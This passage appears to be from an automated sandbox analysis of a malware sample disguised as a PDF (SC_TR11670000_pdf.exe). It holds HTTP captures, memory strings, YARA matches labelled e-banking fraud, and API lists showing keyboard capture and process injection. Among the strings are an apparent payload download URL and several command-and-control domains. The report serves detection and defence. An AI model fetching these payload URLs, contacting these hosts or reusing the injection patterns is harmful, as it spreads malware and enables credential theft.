65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:07:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:07:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 
27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:10:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 
27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Server: nginx  Date: Fri, 13 Dec 2024 12:10:23 GMT  Content-Type: text/html; charset=utf-8  Transfer-Encoding: chunked  Connection: close  Vary: Accept-Encoding  ETag: W/"66cce1df-b96"  Content-Encoding: gzip
                Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Server: nginx  Date: Fri, 13 Dec 2024 12:10:25 GMT  Content-Type: text/html; charset=utf-8  Content-Length: 2966  Connection: close  Vary: Accept-Encoding  ETag: "66cce1df-b96"
                Source: recover.exe, 00000003.00000003.3092659925.0000000003371000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4204450845.0000000003371000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.200.148.45/dashboard/xl.exe
                Source: recover.exe, 00000003.00000003.3092659925.0000000003371000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4204450845.0000000003371000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.200.148.45/dashboard/xl.exe&
                Source: oCCZhsVsNwIIN.exe, 00000007.00000002.4206800241.0000000004C6E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.030002059.xyz
                Source: oCCZhsVsNwIIN.exe, 00000007.00000002.4206800241.0000000004C6E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.030002059.xyz/er88/
                Source: recover.exe, 00000003.00000002.4205854920.0000000004DE2000.00000004.10000000.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000036A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?9B_ppt=1GFNWjEU8kwZ/mmLeya/cJNKrhAK4goi9jYz
                Source: firefox.exe, 00000008.00000002.2219879934.0000000025054000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.idsmart.online/jbgy/?9B_ppt=WpM
                Source: recover.exe, 00000003.00000002.4205854920.0000000005106000.00000004.10000000.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000039C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.stationseek.online/3qlo?9B_ppt=T329z6mTpDO/RjmIsaX6GxS
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: recover.exe, 00000003.00000002.4204255129.0000000003309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: recover.exe, 00000003.00000002.4204255129.00000000032E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: recover.exe, 00000003.00000002.4204255129.00000000032E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: recover.exe, 00000003.00000003.2107451608.0000000008303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: recover.exe, 00000003.00000002.4205854920.000000000492C000.00000004.10000000.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000031EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://tenmyk.shop/irzc/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=nYLQ8syZYIEqykNPtdlYwElZKL5y37q0UOpjKQ4AHu5ne0c
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.0000000003B58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B5425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B5425A
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B54458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B54458
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B40219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00B40219
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B6CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B6CDAC

                E-Banking Fraud

                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4206800241.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4204068794.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4205129970.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4205169396.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1923090053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1924622437.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1924200724.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4204999427.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_00AE3B4C
                Source: SC_TR11670000_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: SC_TR11670000_pdf.exe, 00000000.00000000.1736858249.0000000000B95000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1e40a128-c
                Source: SC_TR11670000_pdf.exe, 00000000.00000000.1736858249.0000000000B95000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_25d3eb9b-f
                Source: SC_TR11670000_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c9da2173-a
                Source: SC_TR11670000_pdf.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_bccc72d2-5
                Source: initial sampleStatic PE information: Filename: SC_TR11670000_pdf.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C8F3 NtClose,1_2_0042C8F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B60 NtClose,LdrInitializeThunk,1_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,1_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674340 NtSetContextThread,1_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674650 NtSuspendThread,1_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BE0 NtQueryValueKey,1_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BF0 NtAllocateVirtualMemory,1_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BA0 NtEnumerateValueKey,1_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B80 NtQueryInformationFile,1_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AF0 NtWriteFile,1_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AD0 NtReadFile,1_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AB0 NtWaitForSingleObject,1_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F60 NtCreateProcessEx,1_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F30 NtCreateSection,1_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FE0 NtCreateFile,1_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FA0 NtQuerySection,1_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FB0 NtResumeThread,1_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F90 NtProtectVirtualMemory,1_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E30 NtWriteVirtualMemory,1_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EE0 NtQueueApcThread,1_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EA0 NtAdjustPrivilegesToken,1_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E80 NtReadVirtualMemory,1_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D30 NtUnmapViewOfSection,1_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D00 NtSetInformationFile,1_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D10 NtMapViewOfSection,1_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DD0 NtDelayExecution,1_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DB0 NtEnumerateKey,1_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C60 NtCreateKey,1_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C00 NtQueryInformationProcess,1_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CF0 NtOpenProcess,1_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CC0 NtQueryVirtualMemory,1_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CA0 NtQueryInformationToken,1_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673010 NtOpenDirectoryObject,1_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673090 NtSetValueKey,1_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036739B0 NtGetContextThread,1_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D70 NtOpenThread,1_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D10 NtOpenProcessToken,1_2_03673D10
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03944340 NtSetContextThread,LdrInitializeThunk,3_2_03944340
